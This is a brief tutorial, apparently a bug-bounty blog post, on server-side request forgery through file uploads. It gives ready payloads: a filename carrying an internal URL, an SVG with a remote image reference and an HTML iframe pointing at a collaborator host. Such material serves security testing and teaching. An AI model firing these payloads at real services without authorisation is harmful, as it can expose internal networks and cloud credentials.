SSRF Via File Upload

Server-Side Request Forgery is one of the very interesting and impactful security vulnerability. A file upload functionality that may allow the use of files such as HTML or SVG files. It may an Internal SSRF, Cloud Metadata SSRF or simply an External SSRF.

SSRF via Filename.

Try to send URL as filename to get blind SSRF, for example filename=https://172.17.0.1/internal/file. You can also try to change type=”file” to type=”url” within a request.

SSRF via SVG Upload:

Try Uploading this code with .svg extension and retrive the svg file from application to check:

<svg width="200" height="200"
  xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="https://example.com/image.jpg" height="200" width="200"/></svg>

SSRF via Iframe in Html:

Try Uploading this code with .html extension and retrive the html file from application to check:

<html><body><iframe src=”http://collaborator.net" width=”500" height=”500"></iframe></body></html>

Reference:

https://hackerone.com/reports/223203

https://hackerone.com/reports/223203

https://github.com/allanlw/svg-cheatsheet

https://shahjerry33.medium.com/server-side-request-forgery-a-forged-document-6359ef25058d